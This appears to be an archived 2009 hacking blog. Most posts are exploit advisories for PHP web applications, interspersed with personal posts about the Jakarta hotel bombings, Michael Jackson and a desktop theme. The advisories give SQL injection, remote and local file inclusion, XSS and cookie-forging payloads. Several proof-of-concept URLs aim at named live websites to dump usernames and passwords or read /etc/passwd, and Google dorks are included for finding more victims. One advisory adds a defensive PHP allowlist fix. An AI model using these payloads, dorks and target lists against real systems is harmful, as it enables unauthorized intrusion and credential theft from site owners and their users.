linkSpheric 0.74 Beta 6 SQL Injection Vuln  

Thursday, July 30, 2009


[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Author : NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"



MAXcms - Databay Content Management System 3.11.20b Multiple RFI Vuln  


[o] MAXcms - Databay Content Management System 3.11.20b Multiple Remote File Inclusion Vulnerability
Software : MAXcms - Databay Content Management System version 3.11.20b
Vendor : http://www.databay.de
Download : http://downloads.sourceforge.net/micro-cms/microcms.zip
Author : NoGe

[o] Vulnerable file
is_projectPath parameter
includes/InstantSite/inc.is_root.php

GLOBALS[thCMS_root] parameter
classes/class.Tree.php
includes/inc.thcms_admin_mediamanager.php
modul/mod.rssreader.php

is_path parameter
classes/class.tasklist.php
classes/class.thcms.php
classes/class.thcms_content.php
classes/class.thcms_modul_parent.php
classes/class.thcms_page.php
classes/class.thcsm_user.php
includes/InstantSite/class.Tree.php

thCMS_root parameter
classes/class.thcms_modul.php
includes/inc.page_edit_tasklist.php
includes/inc.thcms_admin_overview_backup.php
includes/inc.thcms_edit_content.php
modul/class.thcms_modul_parent_xml.php
modul/mod.cmstranslator.php
modul/mod.download.php
modul/mod.faq.php
modul/mod.guestbook.php
modul/mod.html.php
modul/mod.menu.php
modul/mod.news.php
modul/mod.newsticker.php
modul/mod.rss.php
modul/mod.search.php
modul/mod.sendtofriend.php
modul/mod.sitemap.php
modul/mod.tagdoc.php
modul/mod.template.php
modul/mod.test.php
modul/mod.text.php
modul/mod.upload.php
modul/mod.users.php

[o] Exploit
http://localhost/[path]/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de]
http://localhost/[path]/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]
http://localhost/[path]/classes/class.thcsm_user.php?is_path=[evilc0de]
http://localhost/[path]/modul/mod.users.php?thCMS_root=[evilc0de]



Bypass Mikrotik Router  

Wednesday, July 29, 2009


a short tutorial on how to bypass a Mikrotik Router.

download the video here

thx to bob :)



Ultrize TimeSheet 1.2.2 Remote File Inclusion Vuln  


[o] Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability
Software : Ultrize TimeSheet version 1.2.2
Vendor : http://www.ultrize.com/
Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
Author : NoGe

[o] Vulnerable file
include($config['include_dir'].'timesheet.class.php');
include/timesheet.php

[o] Exploit
http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]



Now YOu Know eChiropractic Local File Inclusion Vuln  


[o] Now YOu Know eChiropractic Local File Inclusion Vulnerability
Software : Now YOu Know eChiropractic
Vendor : http://www.echiropractic.net/ - http://www.nowyouknow.net/
Author : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?file=[LFI]

[o] Proof of concept
http://www.nowyouknow.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd
http://www.braile.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd

[o] Dork

"Now You Know Inc"

[o] Notes
this is a private script. many targets are on one IP address.



Basilic 1.5.13 SQL Injection Vuln  

Friday, July 24, 2009


[o] Basilic 1.5.13 SQL Injection Vulnerability

Software : Basilic version 1.5.13
Vendor : http://artis.imag.fr/Software/Basilic/
Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.13.tar.gz
Author : NoGe


[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?idAuthor=[SQL]

[o] Proof of concept
http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--
http://www.iarc.uaf.edu/publications/index.php?idAuthor=-19+union+select+1,version()--

[o] Dork

"Powered by Basilic"



e107 Plugin my_gallery 2.4.1 readfile() LFD Exploit  


[o] e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit

see the exploit at the link below
http://milw0rm.com/exploits/9235


[o] Dork

"e107_plugins/my_gallery"


./NoGe



MiniCWB 2.3.0 Multiple RFI Vuln  

Tuesday, July 21, 2009


[o] MiniCWB 2.3.0 Multiple Remote File Inclusion Vulnerability

Software : MiniCWB version 2.3.0
Vendor : http://www.grafxsoftware.com/
Download : http://www.grafxsoftware.com/login.php?action=form&url=download.php
Author : NoGe

[o] Vulnerable file
include($LANG.".extra.php");
language/en.inc.php
language/hu.inc.php
language/no.inc.php
language/ro.inc.php
language/ru.inc.php

[o] Exploit
http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]

[o] Dork
"Powered by MiniCWB"
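
[o] Added example (not MiniCWB's or the vendor's code)
The include line quoted above, like the one in the Ultrize TimeSheet advisory, builds its path from a variable the file never sets, so a direct request can supply it (typically through register_globals). The sketch below shows the allowlist fix; resolve_language_file(), ALLOWED_LANGS and the demo directory are assumptions made for illustration, and the inputs are constructed.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern quoted in the advisory (kept as a comment, not executed):
//   include($LANG.".extra.php");
// The file never assigns $LANG itself, so the request decides what is included.

// Language codes taken from the advisory's file list (language/*.inc.php).
const ALLOWED_LANGS = ['en', 'hu', 'no', 'ro', 'ru'];

/**
 * Hypothetical helper: map a requested language code to a file in $baseDir.
 * Returns null for anything outside the allowlist, so URLs, traversal
 * sequences, stream wrappers, empty strings and non-string input all fail.
 */
function resolve_language_file($lang, string $baseDir): ?string
{
    if (!is_string($lang) || !in_array($lang, ALLOWED_LANGS, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $lang . '.extra.php');
    // realpath() resolves symlinks; require the result to stay under the base.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary language directory holding one file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lang_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'en.extra.php', "<?php // constructed sample\n");

// Constructed inputs: one valid code and three that must be rejected.
$inputs = ['en', 'http://example.invalid/x', '../../etc/passwd', ['en']];
foreach ($inputs as $input) {
    $file = resolve_language_file($input, $dir);
    echo json_encode($input, JSON_UNESCAPED_SLASHES), ' => ',
        $file === null ? 'rejected' : 'include ' . basename($file), "\n";
    if ($file !== null) {
        include $file; // only ever a fixed, local, allowlisted file
    }
}
unlink($dir . DIRECTORY_SEPARATOR . 'en.extra.php');
rmdir($dir);
```

Independently of the code fix, keep allow_url_include off in php.ini so include cannot fetch a remote URL.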



Jakarta Explosion, Friday July 17 2009  

Friday, July 17, 2009


Bombs minutes apart ripped through two luxury hotels in Jakarta.
The blasts at the J.W. Marriott and Ritz-Carlton
hotels, located side-by-side in an upscale business district in the
capital, blew out windows and scattered debris and glass across the
street, kicking up a thick plume of smoke. Facades of both hotels were
reduced to twisted metal.



The Marriott, which was attacked in 2003 in a bombing blamed on
Southeast Asian terror network Jemaah Islamiyah,
was hit first, followed by the blast at the Ritz two minutes later. The
attacks came just two weeks after a presidential vote expected to
re-elect incumbent Susilo Bambang Yudhoyono who has been
credited with stabilizing a nation previously wracked by militancy.



Local media reported that two people were killed in another explosion
in a car in north Jakarta later Friday. Officials confirmed a blast but
said it did not appear to be related.



English football club Manchester United have cancelled their tour match
in Jakarta after bomb explosions in the Indonesian capital.
Bombs exploded at the Jakarta Marriott and Ritz-Carlton, which was to
host the Manchester United squad for four days from Saturday evening.

The team was scheduled to play Indonesia Super League XI in an
exhibition match in Jakarta Monday. The match was a part of Manchester
United's summer tour. They will arrive in Kuala Lumpur late Friday night
to play a tour match against Malaysian XI at the Bukit Jalil Stadium.

After Jakarta, they were scheduled to fly to Seoul Wednesday before
concluding their four-stop trip in Hangzhou, China, next weekend. But
now with the cancellation of the Jakarta trip the tour is set for big
changes.

The Daily Telegraph reported that Manchester United officials reviewed
the team's security situation and have decided to cancel the trip to
Jakarta as a result of the terrorist attacks.

"Following the explosions in Jakarta, one of which at the hotel the
team were due to stay in, and based on advice received, the directors
have informed the Indonesia FA that the club can not fulfil the fixture
in Jakarta on the 2009 Asian Tour," United said in a statement.






dB Masters Multimedia's Content Manager 4.5 SQL Injection Vuln  

Thursday, July 16, 2009


[o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability
Software : dB Masters Multimedia's Content Manager version 4.5
Vendor : http://www.dbmasters.net/
Author : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?n=xx&id=[SQL]

[o] Proof of Concept
http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--

[o] Dork
"Powered by dB Masters Multimedia's Content Manager"



OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vuln  


[o] OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vulnerability

Software : OnePound Shop version 1.x
Vendor : http://www.onepound.cn/
Author : NoGe

[o] Vulnerable file
productsview.php
categories.php

[o] Exploit
http://localhost/[path]/productsview.php?id=xx&proid=[SQL]
http://localhost/[path]/productsview.php?id=xx&proid=[XSS]
http://localhost/[path]/categories.php?pid=[XSS]

[o] Proof of Concept
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=5
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=4
http://www.tele-way.com/productsview.php?id=87&proid=[XSS]
http://tonysbridal.net/categories.php?pid=[XSS]
http://vendorhotspot.com/categories.php?pid=[XSS]

[o] Dork
"Powered by OnePound"



How To Use Tamper Data Addons  

Friday, July 10, 2009


[x] what is Tamper Data?

Tamper Data is a Mozilla Firefox add-on
used to view and modify HTTP/HTTPS headers and POST parameters,
trace and time HTTP requests and responses,
and security-test web applications by modifying POST parameters.
we can also use this add-on to find an Insecure Cookie Handling Vulnerability.


[x] how to get it?

open the link below.
https://addons.mozilla.org/en-US/firefox/addon/966
and click Add to Firefox. it will be installed automatically in your Firefox.
after installing it you need to restart your browser.


[x] how to use it?

you can download the video tutorial here.
it includes an example of how to use Tamper Data
to find an Insecure Cookie Handling Vulnerability.
have fun and be safe!! :)




./NoGe



Lombego System Blind SQL Injection Vuln  

Thursday, July 9, 2009


[o] Lombego System Blind SQL Injection Vulnerability
Software : Lombego System
Vendor : http://www.lombego.de/
Author : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?page_id=[SQL]
http://localhost/[path]/index.php?page_id=1 and substring(@@version,1,1)=4
http://localhost/[path]/index.php?page_id=1 and substring(@@version,1,1)=5

[o] Proof of Concept
https://sabreconference.wifa.uni-leipzig.de/frontend/index.php?page_id=566+and+substring(@@version,1,1)=4
https://sabreconference.wifa.uni-leipzig.de/frontend/index.php?page_id=566+and+substring(@@version,1,1)=5

[o] Dork
"powered by Lombego Systems"

[o] Notes
this is a private script and some targets are on one host.



milw0rm dead?  


is milw0rm offline now?
coz i read str0ke's goodbye statement on the milw0rm header.
here is the header.



submissions are closed too.
u can see it in the milw0rm footer.



Connection to milw0rm.com (80) timed out.
so is milw0rm really closed and offline or just maintenance?



Rapidsendit Clone 2.1 Insecure Cookie Handling Vuln  

Wednesday, July 8, 2009


[o] Rapidsendit Clone 2.1 Insecure Cookie Handling Vulnerability
Software : Rapidsendit Clone version 2.1
Vendor : http://www.rapidsendit.com/
Demo : http://www.rapidsendit.com/script/demo.html
Author : NoGe


[o] Vulnerable file
admin.php

[o] Exploit
http://localhost/[path]/admin.php
javascript:document.cookie="logged=[md5_password_hash]; path=/";

[o] Proof Of Concept
http://www.rapidsendit.com/script/demo/admin.php
replace the url above with this javascript
javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";
696d29e0940a4957748fe3fc9efd22a3 = admin password

[o] Dork
"Powered By Rapidsendit Clone"



Michael Jackson [ R I P ]  


There Are Ways
To Get There
If You Care Enough
For The Living
Make A Little Space
Make A Better Place

Heal The World
Make It A Better Place
For You And For Me
And The Entire Human Race
There Are People Dying
If You Care Enough
For The Living
Make A Better Place
For You And For Me


"He Is The Greatest Artist On Earth"

Goodbye Jacko!! Rest In Peace...



Server Is Down Ver 1.0 GDM Theme  

Tuesday, July 7, 2009


we are what we are, so don’t tell us how to act – how to be – how to live.
we are what we are, forever live or die don’t tell us how to act – how to be – how to live
we are what we are from beginning to the end!

GDM Theme ServerIsDown Version 1.0
background 1600x1200

click the picture below to download ServerIsDown



enjoy!! ^^




./NoGe



Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vuln  

Sunday, July 5, 2009


[o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability

Software : Siteframe CMS version 3.2.x
Vendor : http://siteframe.org/
Download : http://sitefrane.org/downloads/
Author : NoGe


[o] Description
Siteframe™ is a lightweight content-management system
designed for the rapid deployment of community-based websites.
With Siteframe, a group of users can share stories and photographs,
create blogs, send email to one another, and participate in group activities.
Siteframe enables this by providing web-based content management
so that anyone can create content without needing to learn HTML.

[o] Vulnerable file
document.php

[o] Exploit
http://localhost/[path]/document.php?id=[SQL]
http://localhost/[path]/phpinfo.php

[o] Proof of concept
http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://digi-forum.com/frame/phpinfo.php
http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://myolympus.org/phpinfo.php

[o] Dork
"Powered by Siteframe"

[o] Notes
Upgrade Siteframe CMS from 3.2.x to 5.0.6 (latest)



MyPHPDating 1.0 SQL Injection Vuln  

Thursday, July 2, 2009


[o] MyPHPDating 1.0 SQL Injection Vulnerability

Software : MyPHPDating version 1.0
Vendor : http://www.phponlinedatingsoftware.com/
Demo : http://www.phponlinedatingsoftware.com/demo.htm
Author : NoGe


[o] Description
MyPHPDating 1.0 is a full-featured version of our online dating / Matchmaking software.
It combines all the features of any standard online dating / Matchmaking website plus much more features,
that make your dating website very powerful and easy to use.

[o] Vulnerable file
page.php

[o] Exploit
http://localhost/[path]/page.php?page_id=[SQL]

[o] Proof Of Concept
http://thaigirllover.com/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--

[o] Dork
"Powered by MyPHPDating"



Metasploit Proof of Concept [ Windows ]  


this is a video tutorial about how to use the metasploit GUI on windows.
the target is still the same as in the linux version below, using the RPC DCOM exploit.
hopefully you like it.. :)

download the video here



./NoGe



[d]esign by Amanda [e]dited by NoGe